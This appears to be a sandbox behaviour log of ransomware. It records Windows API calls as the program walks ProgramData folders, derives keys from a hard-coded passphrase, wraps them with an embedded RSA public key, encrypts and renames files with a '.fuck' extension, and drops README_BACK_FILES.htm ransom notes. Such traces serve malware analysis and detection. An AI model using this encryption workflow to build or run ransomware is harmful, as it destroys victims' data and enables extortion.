WriteFile (in: hFile=0xffffffff, lpBuffer=0x2832bf8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.844] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.844] CryptEncrypt (in: hKey=0x2817298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.844] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.844] CloseHandle (hObject=0xffffffff) returned 1 [0236.844] CloseHandle (hObject=0xffffffff) returned 1 [0236.844] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), bFailIfExists=0) returned 0 [0236.844] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", dwFileAttributes=0x0) returned 0 [0236.844] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg")) returned 0 [0236.845] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.fuck")) returned 0 [0236.845] CryptDestroyHash (hHash=0x2817118) returned 1 [0236.845] CryptDestroyKey (hKey=0x2817298) returned 1 [0236.845] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0236.845] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.845] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.845] GetLastError () returned 0x5 [0236.845] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml")) returned 0x20 [0236.845] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", dwFileAttributes=0x80) returned 0 [0236.845] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.846] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.846] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.846] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2833038) returned 1 [0236.851] CryptCreateHash (in: hProv=0x2833038, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.851] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0236.851] CryptHashData (hHash=0x2817118, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.851] CryptDeriveKey (in: hProv=0x2833038, Algid=0x6610, hBaseData=0x2817118, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817298) returned 1 [0236.851] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.851] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.851] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2833148) returned 1 [0236.852] CryptImportPublicKeyInfo (in: hCryptProv=0x2833148, dwCertEncodingType=0x1, pInfo=0x280a920*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280a950*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280a958*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817718) returned 1 [0236.853] CryptEncrypt (in: hKey=0x2817718, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.853] CryptEncrypt (in: hKey=0x2817718, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2832620*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2832620*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.853] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2832620, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.853] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.853] CryptEncrypt (in: hKey=0x2817298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.853] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.853] CloseHandle (hObject=0xffffffff) returned 1 [0236.853] CloseHandle (hObject=0xffffffff) returned 1 [0236.853] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), bFailIfExists=0) returned 0 [0236.854] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", dwFileAttributes=0x0) returned 0 [0236.854] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg")) returned 0 [0236.854] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.fuck")) returned 0 [0236.855] CryptDestroyHash (hHash=0x2817118) returned 1 [0236.855] CryptDestroyKey (hKey=0x2817298) returned 1 [0236.855] CryptReleaseContext (hProv=0x2833038, dwFlags=0x0) returned 1 [0236.855] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0236.855] FindClose (in: hFindFile=0x2817098 | out: hFindFile=0x2817098) returned 1 [0236.855] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\readme_back_files.htm")) returned 0xffffffff [0236.855] AreFileApisANSI () returned 1 [0236.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0236.855] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.856] GetLastError () returned 0x5 [0236.856] GetLastError () returned 0x5 [0236.856] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.856] FindClose (in: hFindFile=0x2816f58 | out: hFindFile=0x2816f58) returned 1 [0236.856] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\readme_back_files.htm")) returned 0xffffffff [0236.856] AreFileApisANSI () returned 1 [0236.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6c68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0236.856] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.856] GetLastError () returned 0x5 [0236.856] GetLastError () returned 0x5 [0236.857] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0236.857] FindClose (in: hFindFile=0x2817458 | out: hFindFile=0x2817458) returned 1 [0236.857] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\readme_back_files.htm")) returned 0xffffffff [0236.857] AreFileApisANSI () returned 1 [0236.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0236.857] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.866] GetLastError () returned 0x5 [0236.866] GetLastError () returned 0x5 [0236.866] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.866] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\DeviceSync\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2816f58 [0236.866] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.867] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0236.867] FindClose (in: hFindFile=0x2816f58 | out: hFindFile=0x2816f58) returned 1 [0236.867] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\DeviceSync\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\devicesync\\readme_back_files.htm")) returned 0xffffffff [0236.867] AreFileApisANSI () returned 1 [0236.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0236.867] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\DeviceSync\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\devicesync\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d08 [0236.868] GetFileType (hFile=0x5d08) returned 0x1 [0236.868] WriteFile (in: hFile=0x5d08, lpBuffer=0x2b9df30*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9df28, lpOverlapped=0x0 | out: lpBuffer=0x2b9df30*, lpNumberOfBytesWritten=0x2b9df28*=0x5ec, lpOverlapped=0x0) returned 1 [0236.869] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.869] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Diagnosis\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0xffffffff [0236.869] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Diagnosis\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\diagnosis\\readme_back_files.htm")) returned 0xffffffff [0236.876] AreFileApisANSI () returned 1 [0236.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd2b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0236.877] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Diagnosis\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\diagnosis\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.882] GetLastError () returned 0x5 [0236.882] GetLastError () returned 0x5 [0236.882] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.882] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\DRM\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2816f58 [0236.883] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.883] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.883] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\DRM\\Server\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2817298 [0236.883] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.884] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.884] FindClose (in: hFindFile=0x2817298 | out: hFindFile=0x2817298) returned 1 [0236.884] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\DRM\\Server\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\drm\\server\\readme_back_files.htm")) returned 0xffffffff [0236.884] AreFileApisANSI () returned 1 [0236.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd5c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0236.884] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\DRM\\Server\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\drm\\server\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.884] GetLastError () returned 0x5 [0236.884] GetLastError () returned 0x5 [0236.884] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0236.884] FindClose (in: hFindFile=0x2816f58 | out: hFindFile=0x2816f58) returned 1 [0236.885] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\DRM\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\drm\\readme_back_files.htm")) returned 0xffffffff [0236.885] AreFileApisANSI () returned 1 [0236.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd418, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0236.885] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\DRM\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\drm\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.885] GetLastError () returned 0x5 [0236.885] GetLastError () returned 0x5 [0236.885] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.885] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Event Viewer\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2816f58 [0236.904] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.904] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.904] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Event Viewer\\Views\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2817458 [0236.913] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.914] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.914] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28171d8 [0236.921] FindNextFileA (in: hFindFile=0x28171d8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.921] FindNextFileA (in: hFindFile=0x28171d8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0236.921] FindClose (in: hFindFile=0x28171d8 | out: hFindFile=0x28171d8) returned 1 [0236.921] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\applicationviewsrootnode\\readme_back_files.htm")) returned 0xffffffff [0236.921] AreFileApisANSI () returned 1 [0236.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x283c6c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0236.921] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\applicationviewsrootnode\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.922] GetLastError () returned 0x5 [0236.922] GetLastError () returned 0x5 [0236.922] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.922] FindClose (in: hFindFile=0x2817458 | out: hFindFile=0x2817458) returned 1 [0236.922] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Event Viewer\\Views\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\readme_back_files.htm")) returned 0xffffffff [0236.922] AreFileApisANSI () returned 1 [0236.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6e78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0236.922] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Event Viewer\\Views\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.922] GetLastError () returned 0x5 [0236.922] GetLastError () returned 0x5 [0236.922] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0236.922] FindClose (in: hFindFile=0x2816f58 | out: hFindFile=0x2816f58) returned 1 [0236.923] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Event Viewer\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\event viewer\\readme_back_files.htm")) returned 0xffffffff [0236.923] AreFileApisANSI () returned 1 [0236.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd1d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0236.923] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Event Viewer\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\event viewer\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.923] GetLastError () returned 0x5 [0236.923] GetLastError () returned 0x5 [0236.923] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.923] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\IdentityCRL\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2817098 [0236.924] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.924] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.924] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\IdentityCRL\\INT\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28171d8 [0236.924] FindNextFileA (in: hFindFile=0x28171d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.924] FindNextFileA (in: hFindFile=0x28171d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.924] FindNextFileA (in: hFindFile=0x28171d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.925] FindClose (in: hFindFile=0x28171d8 | out: hFindFile=0x28171d8) returned 1 [0236.925] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\IdentityCRL\\INT\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\identitycrl\\int\\readme_back_files.htm")) returned 0xffffffff [0236.925] AreFileApisANSI () returned 1 [0236.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ccfe0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0236.925] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\IdentityCRL\\INT\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\identitycrl\\int\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.925] GetLastError () returned 0x5 [0236.925] GetLastError () returned 0x5 [0236.925] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.925] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\IdentityCRL\\production\\*.*", lpFindFileData=0x2b9edc4 